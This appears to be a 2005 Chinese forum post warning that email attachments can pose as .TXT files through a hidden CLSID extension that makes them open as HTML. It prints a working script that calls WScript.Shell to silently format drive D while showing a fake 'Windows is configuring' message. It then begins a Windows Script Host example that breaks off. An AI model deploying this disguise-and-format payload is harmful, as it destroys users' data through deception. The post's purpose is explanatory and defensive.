大家都知道,现在大多数病毒的传播媒介都是可执行文件或脚本文件,但当你收到一分附件为.TXT为后缀名的邮件时,你会不会有所警觉呢?在一定程度上也可以造成破坏!由于目前大多数人使用的是Windows系列的操作系统,而Windows设置是隐藏已知文件扩展名的。当你点击那个看上去很友善的文件时,那些破坏性的东西就会一一跳了出来。
假如你收到一分邮件,附件里的文件名为“美媚大放送.TXT”,你是不是会认定他肯定是纯文本文件呢?那可不一定哦!它的实际文件名可以是“美媚大放送.TXT.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}”。其中的“{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}”在注册表里的含义是HTML文件关联。但是存成文件时它就不会显现出来,你看到的这个.TXT文件其实就是“美媚大放送.TXT.HTML”。那么打开这个文件又会有什么危害呢?如果这个文件的内容如下(警告:以下代码可能带有攻击性,禁止乱用,一切使用后过自负!):
----------------------------------------------------------
〈script〉
a=new ActiveXObject(\"WSCript.Shell\");
a.run(\"format.com D:/q /autotest /u\");
alert(\"Windows is configuring the system. Please do not interrupt this process.\");
〈/script〉
----------------------------------------------------------
那么它就会调用IE运行FORMAT命令,同时显示“Windows is configuring the system. Please do not interrupt this process.”,呵呵,这下你可就惨了。。。要注意哦~
大家大概已经注意到第二行的“WSCript”了吧,对啊,就是它在导演着这场戏。
WSCript全称“Windows Scripting Host”,它是Windows 98新增的功能,是一种批次语言/自动执行工具——它所对应的程序“WSCript.exe”是一个脚本语言解释器,为于WINDOWS目录下,正是它才使得脚本可以被执行,就象执行批处理一样。在Windows Scripting Host脚本环境里,预定义了一些对象,通过它自带的几个对象,可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。
下面我们通过一个小的例子来说明WSCript的功能是如何的强大,而使用又是何等的简单,被人利用的威胁有是如何之大。例如有一个.vbs文件:
Set so=CreatObject(Scripting.FileSystemObject\")
so.GetFile(c:\\Windows\\winipcfg.exe).Copy(\"e:\\winipcfg.exe\")
发表于 2005-8-20 08:15:54